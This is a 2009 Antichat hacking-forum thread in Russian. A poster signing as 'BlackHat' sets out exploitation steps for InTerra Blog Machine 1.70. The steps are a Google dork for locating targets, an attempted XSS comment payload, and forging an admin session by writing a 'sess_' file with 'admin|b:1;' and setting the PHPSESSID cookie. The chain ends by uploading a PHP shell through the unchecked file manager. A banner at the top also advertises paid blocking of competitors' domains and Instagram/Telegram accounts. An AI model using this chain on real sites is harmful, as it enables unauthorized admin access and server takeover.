Форум АНТИЧАТ - Уязвимости InTerra Blog Machine

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Уязвимости InTerra Blog Machine

Опции темы

Поиск в этой теме

Опции просмотра

Уязвимости InTerra Blog Machine

08.01.2009, 00:31

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

Провел на форуме:
7617458

Репутация: 3965

Отправить сообщение для Dimi4 с помощью ICQ

Уязвимости InTerra Blog Machine

Name : InTerra Blog Machine
Site : Dull.ru
Version : 1.70
Dork : "Powered by InTerra Blog Machine"

Существует хсс, но "раскрутить" до конца не получается, так как жестко фильтруется:
lib\safehtml\classes\safehtml.php

PHP код:


		
			
  // dangerous protocols

  var $BlackProtocols = array("javascript", "vbscript", "about", "wysiwyg", "data", "view-source", "ms-its", "mhtml", "shell", "lynxexec", "lynxcgi", "hcp", "ms-help", "help", "disk", "vnd.ms.radio", "opera", "res", "resource", "chrome", "mocha", "livescript", );

Вообщем вот до чего дошол: (Добавление комент.)

Код:

<a href=`http://xek.comd" onclick='overflow'><i>wtf?<a style='font-size:30px; color:red;'>hekked</a></i>

А всё потому, что в actions\addcomment.php

PHP код:


		
			
                //prepare contents

                $comment = strip_tags($_POST['comment'],"<a>,<i>,<b>");

Разрешины три тэги, но клас safehtml всё отрубает. Просьба кто будет смотреть присмотреться к етой хсс, возможна ли она там вообще.

Авторизация. Подмена сесии.

Всё гениально:

PHP код:


		
			
    //check access

    if(!$_SESSION['admin']){

        header("Location: " . SERVER_ROOT);

        exit;

    }

Собственно идем в /tmp
создаем сесию, права 0777:
sess_aaec41a3b692b6be0dc292e40b778595

Код:

admin|b:1;

Ну и вбиваем куку в браузере.

Цитата:

PHPSESSID=aaec41a3b692b6be0dc292e40b778595

После авторизации

Цитата:

http://127.0.0.1/interra/filemanager/

И заливаем шелл. Проверки нет (:
lib\uploader.class.php

PHP код:


		
			
        function copyFile($name,$destination){

            if(!$result = move_uploaded_file($name,$destination)){

                $result = copy($name,$destination);

            }

            return $result; 

        }

Грузится в

Цитата:

http://127.0.0.1/interra/files/shell.php

__________________

BlackHat.

MoDL

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[Обзор уязвимостей vBulletin]	bandera	Форумы	74	07.06.2010 16:19
Переполнение буфера в Kaspersky Anti-Virus	bul666	Мировые новости	9	15.08.2009 15:08
В Windows Mobile найдено две уязвимости	ground_zero	Мировые новости	1	06.02.2007 11:40
Множественные уязвимости в INVISION POWER BOARD 2.1.x	GreenBear	Уязвимости	6	02.03.2006 21:36
Современные информационные угрозы, четвертый квартал 2005	dinar_007	Мировые новости	3	28.01.2006 01:49

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход